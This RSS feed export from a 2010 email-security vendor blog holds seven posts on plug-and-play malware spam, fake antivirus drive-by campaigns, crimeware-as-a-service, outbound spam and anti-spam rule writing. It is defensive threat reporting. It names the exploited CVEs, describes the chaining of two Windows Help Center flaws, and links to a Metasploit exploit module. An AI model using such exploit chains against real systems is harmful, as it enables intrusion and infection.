<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Red Condor&#039;s Security Alerts</title>
	<atom:link href="http://www.redcondor.com/blog/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.redcondor.com/blog</link>
	<description>The Latest Security Trends, Threats and Exploits.</description>
	<lastBuildDate>Wed, 08 Sep 2010 15:15:04 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Crimeware-as-a-Service: A Threat Now More than Ever</title>
		<link>http://www.redcondor.com/blog/?p=366</link>
		<comments>http://www.redcondor.com/blog/?p=366#comments</comments>
		<pubDate>Wed, 08 Sep 2010 15:15:04 +0000</pubDate>
		<dc:creator>Team R.C.</dc:creator>
				<category><![CDATA[Cybercrime]]></category>
		<category><![CDATA[Just plain interesting]]></category>
		<category><![CDATA[CaaS]]></category>
		<category><![CDATA[Crimeware-as-a-service]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[plug-and-play malware]]></category>
		<category><![CDATA[PNP]]></category>

		<guid isPermaLink="false">http://www.redcondor.com/blog/?p=366</guid>
		<description><![CDATA[It wasn’t long ago that crimeware-as-a-service (CaaS) was a new buzzword that made its way across the Internet detailing the next generation of security threats [...]]]></description>
			<content:encoded><![CDATA[<p>It wasn’t long ago that crimeware-as-a-service (CaaS) was a new buzzword that made its way across the Internet detailing the next generation of security threats to computer users and corporate networks around the world. Unfortunately, CaaS is now an even bigger threat.</p>
<p>As malware has evolved and cloud computing has become the latest social and business platform, scammers and cybercriminals have moved away from developing malware for notoriety sake to building online cybercrime services that are designed to support the needs of other cybercriminals, as well as attract new recruits and affiliates. Rather than going through all the effort of developing, hosting and deploying the malware, the criminals are developing toolkits that allow others to perpetuate the crimes, further hiding their operations from detection by law enforcement. Essentially, everything that a criminal would need for cybercrime is now available for purchase.</p>
<p>So what has changed the last couple of years to make CaaS an even bigger threat?</p>
<p>The biggest thing that has changed is that technology has improved, allowing criminals to be more targeted with their threats. As we have seen in the last 6-8 months, traditional email filtering solutions and anti-virus engines are having trouble stopping the sophisticated campaigns that look and feel like big-brand messages and contain content that reads like legitimate email. We have seen the emergence of <a href="http://www.redcondor.com/blog/?tag=plug-and-play-malware" target="_blank">plug-and-play (PNP) malware</a>, which requires only a single click for malware to infect a computer. We have monitored multiple variations of this type of malware, each using a variety of techniques to target users and slip through corporate security systems undetected.</p>
<p>Plug-and-play is one of many delivery vehicles used by cybercriminals to distribute malware. The PNP architecture is a game changer because criminals can simply chain on exploits as they become available without needing to modify their spam campaigns in any way. Examples of malware and exploits that we have stopped include signature-distinct executables, <a href="http://www.redcondor.com/blog/?p=298" target="_blank">Windows Help Center vulnerability</a>, obfuscated JavaScript, PDF vulnerabilities and <a href="http://www.redcondor.com/blog/?p=340" target="_blank">fake A/V tools</a> and Adobe executables.</p>
<p>We have also seen compromised accounts on eBay and other big brands acting as sources for malware and for zombies to acquire spam templates used in malware campaigns. As was mentioned in an earlier post, the styles of the new wave of threats are “far too varied, detailed and idiomatic to have been generated by spammers.” In other words, the people and/or tools perpetuating the malware campaigns are more sophisticated than we have seen in the past.</p>
<p>With the toolkits available and the infrastructure in place, these types of attacks are likely to increase in volume and complexity. Going forward, CaaS providers will continue to provide updates to their toolkits, providing users with increasingly more advanced techniques for compromising computers and networks and new ways to monitor their effectiveness. The CaaS business is not unlike traditional software providers, and the motivation is not unlike a traditional business. Money is driving the commercialization of new CaaS techniques and technologies. As a result, development of the toolkits and online services will continue in an effort to improve performance for the cybercriminals.</p>
<p>As ugly a picture as this presents, companies can protect themselves by taking a more aggressive approach to email security. Relying on end users to serve as a filter and giving them the ability to establish their own personal filtering policies weakens any existing security infrastructure as a whole. Security needs to be dynamic and must be able to react quickly to changes in user behavior and the evolving threat landscape. While CaaS may be the next big thing, even today, it doesn’t necessarily have to impact your business. The big question is, “Will it?”</p>
]]></content:encoded>
			<wfw:commentRss>http://www.redcondor.com/blog/?feed=rss2&amp;p=366</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Phishing is Out… Malware via Social Engineering is the New King</title>
		<link>http://www.redcondor.com/blog/?p=356</link>
		<comments>http://www.redcondor.com/blog/?p=356#comments</comments>
		<pubDate>Wed, 25 Aug 2010 17:44:03 +0000</pubDate>
		<dc:creator>C.S.</dc:creator>
				<category><![CDATA[Cybercrime]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[one-click infection]]></category>
		<category><![CDATA[plug-and-play malware]]></category>
		<category><![CDATA[social engineering]]></category>
		<category><![CDATA[spoofing]]></category>

		<guid isPermaLink="false">http://www.redcondor.com/blog/?p=356</guid>
		<description><![CDATA[Certainly, phishing is not going away, but during the last several weeks, viral activity has increased sharply, and especially for the string of plug-and-play (PNP) [...]]]></description>
			<content:encoded><![CDATA[<p>Certainly, phishing is not going away, but during the last several weeks, viral activity has increased sharply, and especially for the string of <a href="http://www.redcondor.com/blog/?p=302" target="_blank">plug-and-play (PNP) malware campaigns</a>, malware via social engineering has become the new king.</p>
<p>Just how active are the scammers? Three weeks into August, we are approaching a new record in virus rule creation, a record originally set two years ago in August 2008. With several days left in the month, the record is definitely not safe.</p>
<p>The plug-and-play malware campaigns continue to spoof popular brands, including Amazon, eBay, Newegg, Digg, Facebook, Amazon.com, WordPress and Xerox. Scammers are also making their messages more sophisticated while also being more targeted with their campaigns. As we have seen, cyber-criminals have taken great care in creating a look and feel that is consistent with emails that people receive from the host of brands they use on a regular basis. They are also starting to use emails and tactics that spoof lesser known organizations such as an NPR.org newsletter confirmation.</p>
<p>The major new point of interest for these campaigns is the use of what is suspected to be the scraping of emails (essentially emails stolen from the hard-drives of people who have been infected). These are selected in such a manner that they trick the recipient into clicking on a link or an attachment.</p>
<p>I have become fairly astute at identifying a phishing scam, malware threat and other spam simply by looking at it. I have a pretty good grasp of the kinds of language that can be expected from spammer-constructed messages, but these new waves of messages are nowhere near what are commonly found. The style is far too varied, detailed and idiomatic to have been generated by spammers.</p>
<div id="attachment_357" class="wp-caption alignleft" style="width: 310px"><a href="http://www.redcondor.com/blog/wp-content/uploads/2010/08/Multiply.jpg"><img class="size-medium wp-image-357" title="Multiply.com" src="http://www.redcondor.com/blog/wp-content/uploads/2010/08/Multiply-300x157.jpg" alt="" width="300" height="157" /></a><p class="wp-caption-text">Compromised Multiply.com Account</p></div>
<p>This site is one that we identified in a <a href="http://www.redcondor.com/resources/press-releases/081210.St_Bernard_Multiply_NR.pdf" target="_blank">press release</a> as a possible source for zombies to acquire spam templates used in these malware campaigns. It is still one of a few sources that contains this kind of content online, and unfortunately, the compromised blog pages are still active.</p>
<p>The examples are a combination of service generated notification emails, as well as person-to-person emails that are being used as spam templates. All of them reference a link or attachment in some natural way.</p>
<p>This newer technique is not being used in lieu of traditional old-school techniques such as bogus news headlines. The malware is distributed in one of three ways: through links to drive-by downloads (PNP), through obfuscated JavaScript attached as HTML (essentially PNP without the link), and through direct executable attachments. All three forms have taken turns and overlapped to some extent in the new campaigns of the past few weeks. Most of the PNP sites I&#8217;ve looked into have still been redirecting to the <a href="http://www.redcondor.com/blog/?p=340" target="_blank">FakeAV sites</a>, but there may be others, as there are a few variants going around.</p>
<p>I strongly believe that there is a deep connection among exploit kits, malware/crimeware-as-a-service, the PNP campaigns that we have been writing about and this recent explosion of malicious email. It is clear that the criminal underground doesn&#8217;t seem to have been impacted by the recession, and their ability to pump out malware is steadily increasing.</p>
<p>One last thing&#8230; an article speculated recently that this wave of malware could be attributed to the <a href="http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci1265640,00.html" target="_blank">Rock Phish</a> gang that was widely reported as having produced two-thirds of all phishing activity for the second half of 2009. This makes a lot of sense and was also something we considered early on due to the way they spoofed brands, among other similarities. It also makes sense that phishing would begin to trend down as malware trends up. As long as malware can be reliably implanted, gaining credentials through phishing becomes a second-class crime.</p>
<p>While I&#8217;m not predicting the end of phishing, scammers are probably asking themselves, “Why bother?”&#8230; Especially since compromising hosts nets them everything they could have gotten from phishing and a whole lot more.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.redcondor.com/blog/?feed=rss2&amp;p=356</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Drive-by Malware Campaign Redirecting to Fake AV Websites</title>
		<link>http://www.redcondor.com/blog/?p=340</link>
		<comments>http://www.redcondor.com/blog/?p=340#comments</comments>
		<pubDate>Wed, 11 Aug 2010 16:30:44 +0000</pubDate>
		<dc:creator>Team R.C.</dc:creator>
				<category><![CDATA[Security Alerts]]></category>
		<category><![CDATA[drive-by download]]></category>
		<category><![CDATA[drive-by malware]]></category>
		<category><![CDATA[fake AV websites]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[one-click infection]]></category>
		<category><![CDATA[plug-and-play malware]]></category>
		<category><![CDATA[Trojan virus]]></category>

		<guid isPermaLink="false">http://www.redcondor.com/blog/?p=340</guid>
		<description><![CDATA[Red Condor recently blocked another wave of brand spoofing drive-by malware campaigns; this time with redirects to Fake AV websites.
In previous incarnations of these Plug-and-Play [...]]]></description>
			<content:encoded><![CDATA[<p>Red Condor recently blocked another wave of brand spoofing drive-by malware campaigns; this time with redirects to Fake AV websites.</p>
<div id="attachment_341" class="wp-caption alignleft" style="width: 310px"><a href="http://www.redcondor.com/blog/wp-content/uploads/2010/08/fake_av_0.jpg"><img class="size-medium wp-image-341" title="fake_av_0" src="http://www.redcondor.com/blog/wp-content/uploads/2010/08/fake_av_0-300x203.jpg" alt="" width="300" height="203" /></a><p class="wp-caption-text">Screenshot 1</p></div>
<p>In previous incarnations of these Plug-and-Play malware campaigns, the browser would be redirected to a &#8220;Canadian Pharmacy&#8221; or similar site after the exploit suite had been given a chance to execute. A couple of weeks ago, the campaigns began redirecting the browser directly to a downloadable .exe (Windows executable file). This week, the drop-site that scammers are redirecting to is a decent-looking spoof of a Windows XP Explorer window that uses attention-getting graphics and animation to trick users into believing their computer is infected. (See Screenshot 1)</p>
<p>Fake AV is more commonly encountered in malware laden search results, a poisoning usually attributed to black hat search engine optimization. Black hat SEO is an umbrella term used to describe various activities related to elevating malicious and other shady websites in search engine results. Fake AV is also commonly encountered on machines that have already been compromised by malware. In these cases, victims are coaxed into paying a fee to cyber criminals in order to &#8220;remove&#8221; the malware from their system. Fake AV represents yet another incremental step for criminals in finding ways to profit from computers turned zombies.</p>
<p>The drive-by component in this recent wave of brand-spoofing campaigns is using the newer exploit set that targets the Windows Help and Support Center and a few older exploits. We described this newer exploit suite a few weeks ago here: <a href="http://www.redcondor.com/blog/?p=298" target="_blank">http://www.redcondor.com/blog/?p=298</a>.</p>
<div id="attachment_342" class="wp-caption alignleft" style="width: 310px"><a href="http://www.redcondor.com/blog/wp-content/uploads/2010/08/fake_av_1.jpg"><img class="size-medium wp-image-342" title="fake_av_1" src="http://www.redcondor.com/blog/wp-content/uploads/2010/08/fake_av_1-300x260.jpg" alt="" width="300" height="260" /></a><p class="wp-caption-text">Screenshot 2</p></div>
<p>The redirect component of the campaign shunts the browser to the Windows XP Explorer window spoof and is intended to trick victims into believing that their anti-virus engine has detected &#8220;system errors&#8221; and is currently scanning their system &#8220;to prevent data lost&#8221;. While the bogus scanning activity is ongoing, a &#8220;Hardware and security errors detected&#8221; section indicates ominous errors and that &#8220;Spyware has stolen your personal information.&#8221; This landing page is well crafted in terms of graphics (language is another matter) and is quite likely to fool less technically savvy folks. This adds considerably to the virulent nature of this threat.</p>
<p>After a few seconds of bogus scanning activity, a couple of pop-ups are presented to the user. (See Screenshot 2) Humorously, the title of the first of these windows is &#8220;Contraviro Warning.&#8221; A quick search identifies <a href="http://en.wikipedia.org/wiki/ContraVirus" target="_blank">Contraviro</a> as a known fake AV malware that has been circulating for several years. Another quick search for one of the &#8220;found&#8221; viruses turns up similar results: <a href="http://www.2-spyware.com/remove-trojan-im-win32-faker-a.html" target="_blank">http://www.2-spyware.com/remove-trojan-im-win32-faker-a.html</a></p>
<div id="attachment_343" class="wp-caption alignright" style="width: 310px"><a href="http://www.redcondor.com/blog/wp-content/uploads/2010/08/fake_av_2.jpg"><img class="size-medium wp-image-343" title="fake_av_2" src="http://www.redcondor.com/blog/wp-content/uploads/2010/08/fake_av_2-300x285.jpg" alt="" width="300" height="285" /></a><p class="wp-caption-text">Screenshot 3</p></div>
<p>The second dialog box is modal and requires that the user click one of two buttons before control can be returned to any browser window. The pop-up entices the user to click on &#8220;OK&#8221; to &#8220;Start downloading CRITICAL security software update&#8221;. If the user complies, the browser downloads a Windows executable, which evidently is hosted under various names; in this case antivirus_24.exe. (24 happened to be the affiliate ID used in the redirection URL, which tends to indicate that this may be a pay-per-install campaign.)</p>
<p>Here is the permalink to the scan results for the antivirus_24.exe file (only 8 out of 42, or 19%, of AV engines detected the malware sample as dangerous): <a href="http://www.virustotal.com/analisis/dbac0281507987694f6217d655396bb7503bb4ebd2d1d140615e84b5c979171d-1281134394" target="_blank">http://www.virustotal.com/analisis/dbac0281507987694f6217d655396bb7503bb4ebd2d1d140615e84b5c979171d-1281134394</a></p>
<p>After downloading the executable, another pop-up handily instructs the user how to run the software. (See Screenshot 3) Judging by the hits on VirusTotal, this is very likely a Trojan. If the exploit suite hadn&#8217;t already compromised the machine, it is certainly compromised now, and in all probability remotely controllable. Moreover, as the fake warnings presciently indicate, private data (e.g. login credentials) are likely in the process of being stolen.</p>
<div id="attachment_344" class="wp-caption alignleft" style="width: 310px"><a href="http://www.redcondor.com/blog/wp-content/uploads/2010/08/fake_av_3.jpg"><img class="size-medium wp-image-344" title="fake_av_3" src="http://www.redcondor.com/blog/wp-content/uploads/2010/08/fake_av_3-300x151.jpg" alt="" width="300" height="151" /></a><p class="wp-caption-text">Screenshot 4</p></div>
<p>Finally, attempts to close the browser window that started all this trouble or to navigate to another page will fail. Attempting to do so pops up another modal dialog box, and both choices simply return control to the malicious page. (See Screenshot 4) The browser process has to be killed to get out of the loop, but most users will probably just restart their computer. Unfortunately, doing so provides a convenient mechanism for the malware to burrow deeply into the file system.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.redcondor.com/blog/?feed=rss2&amp;p=340</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Outbound Spam is a Different Animal</title>
		<link>http://www.redcondor.com/blog/?p=313</link>
		<comments>http://www.redcondor.com/blog/?p=313#comments</comments>
		<pubDate>Fri, 06 Aug 2010 01:32:44 +0000</pubDate>
		<dc:creator>C.S.</dc:creator>
				<category><![CDATA[Anti-spam Best Practices]]></category>
		<category><![CDATA[Outbound Threats]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[antispam]]></category>
		<category><![CDATA[email threats]]></category>
		<category><![CDATA[outbound mail]]></category>

		<guid isPermaLink="false">http://www.redcondor.com/blog/?p=313</guid>
		<description><![CDATA[Many ISPs, small and medium enterprises (SMEs) and universities are becoming acutely aware of the problems associated with spam emanating from within their networks. Just [...]]]></description>
			<content:encoded><![CDATA[<p>Many ISPs, small and medium enterprises (SMEs) and universities are becoming acutely aware of the problems associated with spam emanating from within their networks. Just about anyone who manages on-premise email services understands the necessity of filtering inbound email to remove spam and other annoying or harmful content. </p>
<p>Outbound mail is another animal, and easily overlooked by many organizations &#8211; until it bites. All it takes is a single virus outbreak on your network or a single compromised email account. Even a few hours&#8217; worth of spam egress can add up to days or weeks of damage control for smaller organizations.</p>
<p>If your early warning system consists of a sudden influx of abuse reports, or discovery of an abnormal number of destination mail servers suddenly rejecting your mail, you’ll soon find yourself engaged in the unpleasant task of de-listing your MTAs from a litany of independently controlled blacklists, each with different and sometimes complex removal requirements. Adding insult to the injury of your now tarnished reputation are the headaches and confusion users suffer when their mail is unexpectedly delayed or outright discarded.</p>
<p>But before you can even begin to unknot the problems caused by an outbound spam leak, you first need to identify the source of the breach. This is not often an easy or a straightforward process. Should another wave of spam emanate from your infrastructure, many blacklist operators will be less forgiving the second time around.</p>
<p><strong>Hijacking Methods Abound</strong></p>
<p>There are many ways spammers can hijack an organization to perform their dirty work. For example, targeted attacks like spear phishing, commonly directed at universities, ISPs and ESPs, can net a surprisingly high response rate. This gives spammers a foothold into the network where they can then authenticate as legitimate users.</p>
<p>Other methods involve compromised machines infected with Trojans and in some cases, spam can be sent unchecked through corporate borders simply because the traffic originates from a workstation turned zombie inside the DMZ.</p>
<p><strong>Naive Assumptions About Inbound Solutions </strong></p>
<p>The outbound spam problem differs considerably from inbound spam. But many people, IT staff included, are unaware of the challenges of stopping outbound spam even if they are well versed in techniques that prevent inbound spam. A common, yet naïve assumption that simply reversing an inbound solution will suffice for filtering the outbound stream can quickly lead to unhappy users; the problem is not symmetric. </p>
<p>Look at it this way: For inbound mail, almost every connection made to your filter is a spammer, but for outbound, almost every connection is legitimate. This asymmetry is an important observation because many of the assumptions about inbound mail filtering don’t apply to outbound filtering.  </p>
<p>In fact, gray listing (in-session defenses), IP/sender reputation (RBLs, black/white lists), and knowledge of valid recipients are the primary front-line defenses utilized by nearly all inbound spam filters. Yet these make less sense and are less effective, and can even cause problems for legitimate mail, when applied to the outbound stream.</p>
<p>Not being able to rely on these mainstay techniques to remove the bulk of outbound spam requires fresh thinking on how to distinguish good messages from bad. What is needed is behavioral modeling, accurate content filtering and sensible application of throttling mechanisms, and a healthy dose of security awareness.</p>
<p><strong>Frustrating Game of Whack-a-Mole</strong></p>
<p>Deliverability is always a concern for spammers, and so is the overhead incurred from blasting out their messages. ISPs are a great target because their reputation can be hijacked, resulting in fewer delays and increased success in message acceptance at the destination. ISPs with poor outbound protection are also much less likely to even notice an outbound spam problem until the damage is already done.</p>
<p>As for SMEs and universities, they often don&#8217;t have the staff required to ensure their systems are secure, or to track down the source of a breach once it has occurred. The task of identifying compromised accounts can become a frustrating game of whack-a-mole while the scammers are busy leveraging the institution&#8217;s computational horse-power and bandwidth for their own ends.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.redcondor.com/blog/?feed=rss2&amp;p=313</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Art and Science of Writing the Rules of Spam Detection</title>
		<link>http://www.redcondor.com/blog/?p=306</link>
		<comments>http://www.redcondor.com/blog/?p=306#comments</comments>
		<pubDate>Thu, 29 Jul 2010 16:31:58 +0000</pubDate>
		<dc:creator>Team R.C.</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[anti-spam]]></category>
		<category><![CDATA[anti-spam rules]]></category>
		<category><![CDATA[false positives]]></category>
		<category><![CDATA[junk mail]]></category>

		<guid isPermaLink="false">http://www.redcondor.com/blog/?p=306</guid>
		<description><![CDATA[C.S. is a regular contributor to the Red Condor Security blog and a master at writing anti-spam rules—handwritten scripts that target new, slippery spam campaigns [...]]]></description>
			<content:encoded><![CDATA[<p>C.S. is a regular contributor to the Red Condor Security blog and a master at writing anti-spam rules—handwritten scripts that target new, <a href="http://www.redcondor.com/blog/?p=298" target="_blank">slippery spam campaigns</a> that automated methods such as session defenses, virus scans and static policy settings can’t detect.  The Red Condor filters use up to 60,000 rules at any one time, with new rules being added in near real-time. Team Red Condor sat down with C.S. this week to ask him about this process.</p>
<p><strong>Is rule-writing a science or an art?</strong></p>
<p>Both. The science involves text processing and analysis at a minimum, but can get fairly elaborate with machine learning and statistical methods to aid in expert analysis &#8211; particularly useful in exposing invariant components of what would appear to the uninitiated as a mind-numbing degree of randomization in spam campaigns.</p>
<p><strong>And the art?</strong></p>
<p>The art comes with years of hands-on experience, and learning to balance the many constraints spam reviewers must keep in mind. For example, we need to ensure that our rules are fast and efficient, block spam and never ham (good mail), and don&#8217;t target trivial aspects of a campaign that are unstable and likely to change during a campaign run or over longer time intervals as the spammers continue to randomize their approach. The rules need to be general so that we’re not writing them in a one-to-one ratio with spam samples, but not so general that they end up matching unanticipated features of legitimate email. And we need to make the rules as fast as possible in response to real-time events.</p>
<p><strong>Describe the rule-writing process&#8211;from detection of a new campaign to creating and activating the rule to block it.</strong></p>
<p>The cycle looks something like this: A novel campaign emerges that seeps through our defenses, and we begin obtaining samples immediately. The samples are analyzed by our 24/7/365 review staff, who then describe features of the campaign to our filter stack, which is then updated within seconds to all deployed gateway security devices. This causes the samples from the new campaign to cease arriving in the reviewers&#8217; queue as the breach has been dealt with. Rinse, repeat.</p>
<p><strong>Are junk mail and spam rules different?</strong></p>
<p>Yes. One of the complexities of using a spam filter is that I have a notion of what spam is, but my neighbor&#8217;s definition is likely different. There simply is no satisfactory definition for spam that covers everyone who uses email. Some people consider spam to be anything that they receive that they didn&#8217;t want. Others may view any email that has some sort of advertisement as spam, even if they have purchased items from the company in the past and specifically opted in to receive discounts and what not. Because Red Condor doesn’t model its filters at an individual mailbox granularity, we have to make some compromises, and Junk rules are part of how we accomplish this. Our notion of spam is meant to drive at the heart of an almost universal commonality in perspective of what spam is: spam either explicitly uses deceptive tactics to make its way past filters, or has content that is intended to deceive or harm the recipient in some way.</p>
<p><strong>According to your <a href="http://www.redcondor.com/blog/?page_id=16" target="_blank">bio</a>, your favorite rules are “simple gems.”  What do you mean by this?</strong></p>
<p>Occasionally we detect annoyance campaigns, usually associated with probing activity where there is no sensible payload to the spam. These can be completely randomized with very little to &#8220;bite on&#8221;. This makes describing the campaigns more difficult (essentially tantamount to describing patterns in the decimal expansion of pi), which can result in rather convoluted looking rules where several features have to be present for a match to take place. To me, these are just ugly beasts when compared to say a simple eight-byte string that has blocked millions of spam over several years without generating any false positives.</p>
<p><strong>How do you measure a rule’s worth?</strong></p>
<p>Well, one standard would simply be the number of hits that it acquires over its lifetime. However, there is complexity here, too, related to volume. Just because a rule targets the lower volume campaigns doesn&#8217;t mean it&#8217;s worth less than a rule that targets high-volume spam. It&#8217;s just where the rule lies in the distribution. We have to have rules that cover all scales or else customers will receive spam.</p>
<p>A better measure of worth is the false-positive rate. It&#8217;s not uncommon for us to discard rules that generate just two or three false positives, even when they have blocked millions of spam, but we have very strict standards and take reports of false positives very seriously; we always strive to do better.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.redcondor.com/blog/?feed=rss2&amp;p=306</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>…And the Plug-and-Play Malware Exploits Continue</title>
		<link>http://www.redcondor.com/blog/?p=302</link>
		<comments>http://www.redcondor.com/blog/?p=302#comments</comments>
		<pubDate>Mon, 26 Jul 2010 15:22:37 +0000</pubDate>
		<dc:creator>C.S.</dc:creator>
				<category><![CDATA[Security Alerts]]></category>
		<category><![CDATA[Amazon spam]]></category>
		<category><![CDATA[Gawab spam]]></category>
		<category><![CDATA[ImageShack spam]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[one-click infection]]></category>
		<category><![CDATA[plug-and-play malware]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.redcondor.com/blog/?p=302</guid>
		<description><![CDATA[Well, these scammers are busy…
Less than 24 hours after issuing a warning of new variations and tactics being used in the one-click, plug-and-play malware campaign [...]]]></description>
			<content:encoded><![CDATA[<p>Well, these scammers are busy…</p>
<p>Less than 24 hours after issuing a <a href="http://www.redcondor.com/blog/?p=298" target="_blank">warning</a> of new variations and tactics being used in the one-click, plug-and-play malware campaign that we have been monitoring the past several months, we blocked a number of new messages that spoofed Amazon, ImageShack and Gawab. All of the messages used the plug-n-play malware distribution architecture.</p>
<p>Interestingly, Friday’s messages reverted to the older exploit set that has been in use for the past couple of months.</p>
<p>There is a new twist in these messages, however. The scammers still perform the drive-by download as usual, but instead of using the redirection page to drop you on a Canadian Pharmacy site, the redirect instructs the browser to download a .exe (adobe_flash_install.exe) which, as of this morning, was not detected by any AV engine.</p>
<p>Below is the VT analysis of this malware:</p>
<p><a href="http://www.virustotal.com/analisis/53b687184961fbc9799509347608a5bbddb092b46f78f271c072b72d628df8b8-1279910999">http://www.virustotal.com/analisis/53b687184961fbc9799509347608a5bbddb092b46f78f271c072b72d628df8b8-1279910999</a></p>
<p>Also, in case the browser does not honor the refresh directive, the redirect page itself renders as a blank page with a single image on it:</p>
<p><a href="http://www.thecoca-colacompany.com/images/noflash_singlevideo.gif">http://www.thecoca-colacompany.com/images/noflash_singlevideo.gif</a></p>
<p><em>(The above link is safe to view. The spammers are using a legitimate image hosted on Coca-Cola&#8217;s website.)</em></p>
<p>Clicking on the image on the redirect page will also download the malicious .exe.</p>
<p>All this is in addition to the usual litany of exploits employed by these campaigns; they are using a couple of different versions this time, none of which is detected by more than a handful of AV engines. The malicious payloads include two signature-distinct executables, most likely two instances of the same Trojan that has simply been mutated:</p>
<p><a href="http://www.virustotal.com/analisis/fe6bf009c6e3085d0f41e14022a2b5729a0c3cc7622c81c7234ab21b0d07dc9d-1279912776">http://www.virustotal.com/analisis/fe6bf009c6e3085d0f41e14022a2b5729a0c3cc7622c81c7234ab21b0d07dc9d-1279912776</a></p>
<p><a href="http://www.virustotal.com/analisis/d6af1138118bba51c20fa74a1a6fc560f84e98d4cb3830c1a37d14a7b4d70b37-1279909339">http://www.virustotal.com/analisis/d6af1138118bba51c20fa74a1a6fc560f84e98d4cb3830c1a37d14a7b4d70b37-1279909339</a></p>
<p>Additionally there is the usual, freshly mutated PDF exploit:</p>
<p><a href="http://www.virustotal.com/analisis/2a56e56ea197fdbf77ee7fe77125bc67a5c89474dcc99bc0789000956c198788-1279912917">http://www.virustotal.com/analisis/2a56e56ea197fdbf77ee7fe77125bc67a5c89474dcc99bc0789000956c198788-1279912917</a></p>
<p>And of course there are the other exploits that usually accompany these campaigns, but they do not appear to have changed much.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.redcondor.com/blog/?feed=rss2&amp;p=302</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>One-Click Malware Spammers Continue to Find New Avenues of Exploitation</title>
		<link>http://www.redcondor.com/blog/?p=298</link>
		<comments>http://www.redcondor.com/blog/?p=298#comments</comments>
		<pubDate>Fri, 23 Jul 2010 03:21:11 +0000</pubDate>
		<dc:creator>C.S.</dc:creator>
				<category><![CDATA[Security Alerts]]></category>
		<category><![CDATA[banking Trojan]]></category>
		<category><![CDATA[one-click infection]]></category>
		<category><![CDATA[plug-and-play malware]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Zbot]]></category>

		<guid isPermaLink="false">http://www.redcondor.com/blog/?p=298</guid>
		<description><![CDATA[In more than one blog post during the last several months, we have discussed a sophisticated plug-and-play malware campaign that infects users’ computers with a [...]]]></description>
			<content:encoded><![CDATA[<p>In more than one blog post during the last several months, we have discussed a sophisticated plug-and-play malware campaign that infects users’ computers with a single click. During the last several months, the spammers have spoofed several major brands, including Facebook, Ebay, Amazon, YouTube, GoDaddy.com, WordPress and Wikipedia. Today, we blocked another variant, which at the time we blocked it, the drive-by downloader component had only been detected by a single anti-virus engine (as is typical for these campaigns).</p>
<p>One of the emails in the campaign had this subject line: “Unauthorized ACH Transaction.” The email warns recipients that an unauthorized ACH transaction was recently initiated from their bank account, but it was rejected by the “Electronic Payments Association.” The user is then invited to click on an embedded link to review the transaction report. The single-click could infect users’computers with a Trojan virus.</p>
<p>We also noticed other campaigns today that were using this technique, but spoofing Xerox WorkCentre messages which are used to send scanned documents as attachments over email.</p>
<p>The one-click malware spammers finally switched out one of the older exploits they had been using for months (CVE-2006-0003, the MDAC RDS.Dataspace ActiveX vulnerability). It was replaced with a more recent one, the Windows Help Center vulnerability (CVE-2010-1885). That flaw was reported in early June, and Microsoft recently issued a patch. For the first time that I am aware of, it is being exploited in combination with yet another vulnerability, CVE-2010-2265, a cross-site scripting (XSS) flaw; chaining the two achieves remote code execution, which makes this spam attack a blended threat.</p>
<p>It appears that the code used in this attack was copied verbatim from public exploit repositories that collect such threats for research purposes. It’s worth noting that the previous exploits from this campaign also used proof-of-concept code virtually unchanged from public sources.</p>
<p><strong>Game-changing, plug-and-play attacks</strong></p>
<p>Here is an example of the newly introduced code being used in this attack:</p>
<p><a href="https://www.metasploit.com/redmine/projects/framework/repository/revisions/9495/diff/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb">https://www.metasploit.com/redmine/projects/framework/repository/revisions/9495/diff/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb</a></p>
<p>I&#8217;ve been writing about this new trend in <a href="http://www.redcondor.com/blog/?p=258">one-click malware</a> for months now. Recently, I had an epiphany.</p>
<p>Essentially the spammers have constructed an efficient malware distribution framework where they can use their &#8220;normal&#8221; spam campaigns in double-duty mode. This allows an efficient search of Internet-connected hosts to find and exploit vulnerable machines.</p>
<p>This activity is transparent to the normal function of their spam campaigns. In other words, they can spamvertize any website as usual, but now have the added bonus of piggybacking these campaigns with modular attacks that can be updated by criminals at any time and with little effort.</p>
<p>For this reason I have started referring to this technique as a &#8220;plug-n-play&#8221; architecture because they can simply chain on exploits as they become available without needing to modify their spam campaigns in any way. They can use this technique in any spam campaign that uses a URL based call-to-action. This is a game changer.</p>
